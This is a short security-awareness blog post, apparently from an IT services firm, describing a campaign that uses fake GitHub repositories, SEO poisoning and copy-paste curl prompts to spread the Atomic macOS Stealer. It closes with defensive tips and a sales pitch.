Widespread Info stealer Campaign Targeting macOS Users

A new wave of malware is making the rounds — and this time, macOS users are in the crosshairs. Security researchers have uncovered a large-scale campaign that uses fake GitHub repositories and brand impersonation to spread infostealer malware like Atomic macOS Stealer (AMOS).

How the Attack Works

Cybercriminals are taking advantage of trusted platforms and well-known brands to trick users into downloading malicious software. Here’s the playbook:

• Fake GitHub Repos: Attackers set up GitHub pages disguised as legitimate software (e.g., password managers like LastPass, crypto wallets, AI tools).

• SEO Poisoning: These pages are optimized to appear at the top of search results, luring unsuspecting users.

• Malicious Redirects: Instead of installing real software, the links send users to rogue websites like macprograms-pro[.]com.

• Terminal Commands: Victims are prompted to run copy-paste commands (often curl) that secretly download malware.
  

The end goal? Install AMOS or its variant SHAMOS — malware designed to steal sensitive data like passwords, crypto keys, and personal files.

Why It Works

• GitHub and brand names like LastPass carry built-in trust.

• Search engine optimization ensures fake repos are easy to find.

• Attackers use multiple accounts and naming patterns to avoid quick takedowns.
  

What You Can Do

1. Verify before you download: Always confirm that software is from the vendor’s official site or verified GitHub repo.

2. Be suspicious of copy-paste commands: If a site tells you to run an unfamiliar terminal command, stop and double-check.

3. Stay patched and protected: Keep macOS up to date and use endpoint security tools.

4. Educate your teams: Share this info with colleagues — awareness is the best defense.
   

MacOS is no longer “immune” to malware. Cybercriminals are scaling their campaigns with professional-looking tactics that exploit trust in platforms and brands. Staying cautious and verifying sources is critical to protecting your data.

📞 Looking to strengthen your defenses? Plexus IT offers comprehensive cybersecurity health checks and team training to help you identify and stop risks early. Get in touch with us today!